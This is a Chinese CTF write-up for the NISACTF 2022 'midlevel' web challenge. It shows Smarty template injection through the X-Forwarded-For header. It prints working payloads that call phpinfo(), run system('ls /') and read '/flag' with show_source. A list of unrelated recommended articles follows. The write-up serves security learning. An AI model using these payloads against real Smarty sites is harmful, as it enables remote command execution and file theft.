[NISACTF 2022]midlevel

妙尽璇机2024-01-05 14:54

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码 
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码 
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码 
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
AI分享猿6 小时前
雷池 WAF 免费版实测:企业用 Apache 搭环境,护住跨境电商平台
web安全·github·apache
介一安全10 小时前
【Frida Android】实战篇3:基于 OkHttp 库的 Hook 抓包
android·okhttp·网络安全·frida
AI绘画小3312 小时前
渗透测试数据库判断卡壳?分类 + 方法 + SQL/NoSQL 脚本速用
服务器·数据库·sql·mysql·web安全·nosql
Z3r4y14 小时前
【代码审计】RuoYi-4.2 五处安全问题分析
java·web安全·代码审计·若依4.2·ruoyi-4.2
信创天地14 小时前
RISC-V 2025年在国内的发展趋势
python·网络安全·系统架构·系统安全·运维开发
红树林0714 小时前
渗透测试之json_web_token(JWT)
网络协议·安全·web安全
北京耐用通信16 小时前
冶金车间“迷雾”重重?耐达讯自动化Profibus转光纤为HMI点亮“透视眼”!
人工智能·物联网·网络协议·网络安全·自动化
unable code16 小时前
攻防世界-Misc-can_has_stdio?
网络安全·ctf·misc·1024程序员节
m0_7381207216 小时前
内网横向靶场——记录一次横向渗透(三)
开发语言·网络·安全·web安全·网络安全·php
Jerry25050917 小时前
微信小程序必要要安装SSL证书吗?小程序SSL详解
网络·网络协议·网络安全·微信小程序·小程序·https·ssl
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件04Linux下V2Ray安装配置指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Labelme从安装到标注:零基础完整指南07BongoCat - 跨平台键盘猫动画工具08《大数据技术原理与应用》实验报告三 熟悉HBase常用操作09全面评测 | Photoshop 2026 新特性深度解析与实测体验10看了下昨日泄露的苹果 App Store 源码……